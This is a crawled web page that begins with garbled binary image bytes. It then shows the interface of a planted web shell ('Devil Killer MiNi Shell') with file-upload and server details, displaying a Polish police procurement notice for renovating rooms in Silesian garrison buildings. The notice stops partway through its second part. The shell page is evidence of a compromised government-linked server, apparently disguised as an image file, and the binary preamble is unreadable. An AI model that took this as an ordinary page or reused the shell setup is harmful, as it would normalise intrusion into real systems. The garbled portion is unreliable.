JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240405/0027378301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty pomieszczeń w obiektach jednostek garnizonu śląskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Katowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270208292</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lompy 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-038</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ka.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.slaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty pomieszczeń w obiektach jednostek garnizonu śląskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-67a823a6-f336-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00273783</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00244141/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Remonty pomieszczeń w obiektach jednostek garnizonu śląskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://slaska-policja.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s;b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z<br/>systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;c) Zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 10.0;d) Włączona obsługa JavaScript;e) Zainstalowany program<br/>Acrobat Reader lub inny obsługujący pliki w formacie .pdf.f) Dopuszczalny format przesyłanych danych tj. plików o wielkości do 50<br/>MB w formatach: .pdfg) Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, jest w Systemie zaszyfrowany.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.h)<br/>Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”. Poniżej została określona instrukcja<br/>korzystania z Platformy, tj.: a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu. Po wprowadzeniu<br/>danych<br/>użytkownika tj. adresu e-mail oraz hasła zgłoszenie jest automatycznie akceptowane przez system. b) w zakładce „Postępowania”,<br/>„Lista postępowań otwartych” należy wybrać niniejsze postępowanie oraz korzystając z polecenia „zgłoś się do udziału w<br/>postępowaniu” przejść do Formularza rejestracyjnego – w przypadku, gdy Wykonawca nie posiada konta na Platformie lub panelu<br/>logowania użytkownika do Systemu.<br/>c) po wypełnieniu Formularza rejestracyjnego Wykonawca otrzyma e-maila informującego, że może dokonać pierwszego logowania<br/>do Platformy.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z zasadami korzystania z https://slaskapolicja.<br/>eb2b.com.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce Pytania/Informacje”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/>nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221<br/>ustawy. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z<br/>09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg).b) W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z Zaleca się, aby komunikacja<br/>z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza Pytania/Informacje”, nie za pośrednictwem adresu<br/>email.<br/>Informacji technicznych i weryfikacji danych oraz podpisów elektronicznych związanych z prowadzonym postępowaniem<br/>udziela Operator Platformy Zakupowej pod numerem telEfonu (+48) 22 378 39 70, (+48) 22 258 48 61, (+48) 22 428 19 28, e-mail: helpdesk@eb2b.com.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji w<br/>Katowicach z siedzibą przy ul. J. Lompy 19, 40-038 Katowice; 2. Inspektor Ochrony Danych wykonuje swoje obowiązki w siedzibie<br/>Komendy Wojewódzkiej Policji w Katowicach, zlokalizowanej w Katowicach przy ul. J. Lompy 19, tel. 47-851-24-03, e<br/>mailiod.kwp@ka.policja.gov.pl; 3. Pani/Pana dane osobowe będą przetwarzane w celu/ celach przygotowania i przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego oraz realizacji tego zamówienia; 4. Podstawą prawną przetwarzania<br/>dotyczących Pani/Pana danych osobowych jest ustawa z dnia 11 września 2019r. Prawo zamówień publicznych(Dz.U.<br/>2022r.poz.1710), zwana w dalszej części „ustawą Pzp”; 5. Odbiorcą Pani/Pana danych osobowych może być Urząd Zamówień<br/>Publicznych, ponadto w zakresie określonym w ustawie Pzp, dane mogą być publikowane<br/>nastronieinternetowejhttp://bip.katowice.kwp.policja.gov.pl oraz innym podmiotom uprawnionym na podstawie odrębnych<br/>przepisów;6.Pani/Pana dane nie będą przekazywane do państwa trzeciego, organizacji międzynarodowej; 7. Okres przechowywania<br/>Pani/Pana danych osobowych wynika z przepisów dotyczących okresów przechowywania akt w Policji. 8. Posiada Pani/Pan prawo<br/>żądania od Administratora dostępu do danych dotyczących Pani/Pana osoby, sprostowania, ograniczenia przetwarzania i wniesienia<br/>sprzeciwu wobec przetwarzania danych osobowych w zakresie określonym przepisami prawa; 9. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych; 10. Podanie danych jest<br/>wymogiem<br/>ustawowym; 11.W przypadku niepodania danych nie będzie możliwy udział w postępowaniu o udzielenie<br/>zamówieniapublicznego;12.Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym<br/>profilowaniu13.Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą o ochronie danych osobowych<br/>i<br/>Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej RODO). Obowiązek<br/>poinformowania podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych osobowych spoczywa na<br/>Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art. 14 RODO wobec osób fizycznych,<br/>od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o niniejsze zamówienie złożone w<br/>załączniku nr1 do SWZ – formularz ofertowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2380-76/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 – KMP w Jastrzębiu-Zdroju – remont PdOZ, suszarni i pomieszczeń zespołu Dyżurnych. Zgodnie z dokumentacją techniczną tj. STWiOR, przedmiar robót - zadanie obejmuje m.in. wykonanie robót rozbiórkowych, wykonanie robót tynkarskich, wykonanie robót malarskich, wykonanie posadzek, wykonanie okładzin ściennych z płytek, wykonanie robót elektrycznych w obiekcie: KMP Jastrzębie-Zdrój. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród ofert niepodlegających odrzuceniu na podstawie kryterium dla każdego z zadań: <br/>a.	cena oferty brutto – 60 %<br/>b.	okres gwarancji na roboty budowlane - 40 %<br/><br/>2.	Sposób oceny ofert. Oceniane będą tylko oferty niepodlegające odrzuceniu – ważne, według następującego wzoru i punktacji:<br/>Y=A+B<br/>gdzie:<br/>Y - Suma punktów badanej ważnej oferty <br/>A - cena oferty brutto - 60%, co odpowiada 60 pkt;<br/>B -wydłużenie okres gwarancji na roboty budowlane - 40 %, co odpowiada 40 pkt;<br/>co daje łącznie maksymalnie 100 pkt.<br/>O wyborze najkorzystniejszej oferty zadecyduje najwyższa ilość punktów uzyskanych łącznie za wszystkie kryteria.<br/><br/>2.1.	Kryterium A - cena oferty brutto.<br/>Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w ofertach do ceny najniższej spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru: <br/>A=(C min)/(C bad) x 60 pkt <br/><br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wykonawcę<br/>C min - najniższa cena oferty brutto;<br/>C bad - cena brutto badanej oferty.<br/><br/>	Wyznaczenie wartości punktów:<br/>a)	ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60;<br/>b)	inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru;<br/>c)	jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>	Zasady przyznawania punktów:<br/>a)	Wartości liczone będą do dwóch miejsc po przecinku;<br/>b)	Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/><br/>2.2.	Kryterium B – oferowany okres gwarancji na roboty budowlane. <br/>W ramach kryterium „Okres gwarancji” ocena będzie dokonywana na podstawie deklaracji zawartej w Formularzu ofertowym zgodnie z poniższymi zasadami: <br/>Okres gwarancji – oznacza okres liczony od daty odbioru końcowego, w którym Wykonawca w ramach wynagrodzenia za wykonanie przedmiotu zamówienia zapewni Zamawiającemu gwarancję jakości wykonania zamówienia zgodnie z SWZ, w szczególności zgodnie ze wzorem umowy, w tym zapewniając usługi usunięcia zidentyfikowanych wad w zakresie zrealizowanych świadczeń na warunkach określonych w umowie. <br/>	Wykonawca winien zadeklarować zaokrągloną do pełnego roku wartość z przedziału od 24 do 60 miesięcy dla zadań 1 i 3 oraz od 60 do 96 miesięcy dla zadania 2.<br/>	Zadeklarowanie okresu gwarancji krótszego niż 24 miesięcy dla zadań 1 i 3 oraz 60 miesięcy dla zadania 2 skutkuje odrzuceniem oferty, podanie wartości większej od 60 miesięcy dla zadań 1 i 3 oraz 96 miesięcy dla zadania 2, skutkuje przyjęciem jej do umowy, natomiast do oceny ofert zostanie przyjęta największa z dopuszczalnych wartości całkowitych tj. 60 miesięcy dla zadań 1 i 3 oraz 96 miesięcy dla zadania 2.<br/>	Brak określenia okresu gwarancji w Formularzu ofertowym będzie uznany przez Zamawiającego za deklarację minimalnego okresu gwarancji przyjętego przez Zamawiającego tj. 24 miesiące dla zadań 1 i 3 oraz 60 miesięcy dla zadania 2. <br/><br/>Ocena będzie dokonywana poprzez porównanie okresu gwarancji w badanej ofercie do najdłuższego zaoferowanego okresu gwarancji na roboty budowlane spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/><br/>B=(G bad)/(G max) x 40 pkt <br/><br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wykonawcę<br/>G bad – okres gwarancji oferty badanej (w miesiącach);<br/>G max – najwyższy spośród zaoferowanych okresów gwarancji (w miesiącach).<br/>Zamawiający wymaga, aby okres rękojmi był równy okresowi zaoferowanej gwarancji na roboty budowlane.<br/><br/>	Wyznaczenie wartości punktów:<br/>a)	ważna oferta z najdłuższym okresem gwarancji na roboty budowlane otrzyma maksymalną liczbę punktów tj. 40;<br/>b)	inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru;<br/>c)	jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>	Zasady przyznawania punktów:<br/>a)	Wartości liczone będą do dwóch miejsc po przecinku;<br/>b)	Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2 – Zabrze KP III – realizacja zaleceń ekspertyzy stropu. Zgodnie z dokumentacją techniczną tj. ekspertyzą budowlaną stropu (wraz z załcznikami), przedmiar robót – zadanie obejmuje m.in. roboty naprawcze stropu nad I piętrem, roboty naprawcze posadzek, wykonanie robót elektrycznych: KP III Zabrze. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród ofert niepodlegających odrzuceniu na podstawie kryterium dla każdego z zadań: <br/>a.	cena oferty brutto – 60 %<br/>b.	okres gwarancji na roboty budowlane - 40 %<br/><br/>2.	Sposób oceny ofert. Oceniane będą tylko oferty niepodlegające odrzuceniu – ważne, według następującego wzoru i punktacji:<br/>Y=A+B<br/>gdzie:<br/>Y - Suma punktów badanej ważnej oferty <br/>A - cena oferty brutto - 60%, co odpowiada 60 pkt;<br/>B -wydłużenie okres gwarancji na roboty budowlane - 40 %, co odpowiada 40 pkt;<br/>co daje łącznie maksymalnie 100 pkt.<br/>O wyborze najkorzystniejszej oferty zadecyduje najwyższa ilość punktów uzyskanych łącznie za wszystkie kryteria.<br/><br/>2.1.	Kryterium A - cena oferty brutto.<br/>Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w ofertach do ceny najniższej spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru: <br/>A=(C min)/(C bad) x 60 pkt <br/><br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wykonawcę<br/>C min - najniższa cena oferty brutto;<br/>C bad - cena brutto badanej oferty.<br/><br/>	Wyznaczenie wartości punktów:<br/>a)	ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60;<br/>b)	inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru;<br/>c)	jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>	Zasady przyznawania punktów:<br/>a)	Wartości liczone będą do dwóch miejsc po przecinku;<br/>b)	Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/><br/>2.2.	Kryterium B – oferowany okres gwarancji na roboty budowlane. <br/>W ramach kryterium „Okres gwarancji” ocena będzie dokonywana na podstawie deklaracji zawartej w Formularzu ofertowym zgodnie z poniższymi zasadami: <br/>Okres gwarancji – oznacza okres liczony od daty odbioru końcowego, w którym Wykonawca w ramach wynagrodzenia za wykonanie przedmiotu zamówienia zapewni Zamawiającemu gwarancję jakości wykonania zamówienia zgodnie z SWZ, w szczególności zgodnie ze wzorem umowy, w tym zapewniając usługi usunięcia zidentyfikowanych wad w zakresie zrealizowanych świadczeń na warunkach określonych w umowie. <br/>	Wykonawca winien zadeklarować zaokrągloną do pełnego roku wartość z przedziału od 24 do 60 miesięcy dla zadań 1 i 3 oraz od 60 do 96 miesięcy dla zadania 2.<br/>	Zadeklarowanie okresu gwarancji krótszego niż 24 miesięcy dla zadań 1 i 3 oraz 60 miesięcy dla zadania 2 skutkuje odrzuceniem oferty, podanie wartości większej od 60 miesięcy dla zadań 1 i 3 oraz 96 miesięcy dla zadania 2, skutkuje przyjęciem jej do umowy, natomiast do oceny ofert zostanie przyjęta największa z dopuszczalnych wartości całkowitych tj. 60 miesięcy dla zadań 1 i 3 oraz 96 miesięcy dla zadania 2.<br/>	Brak określenia okresu gwarancji w Formularzu ofertowym będzie uznany przez Zamawiającego za 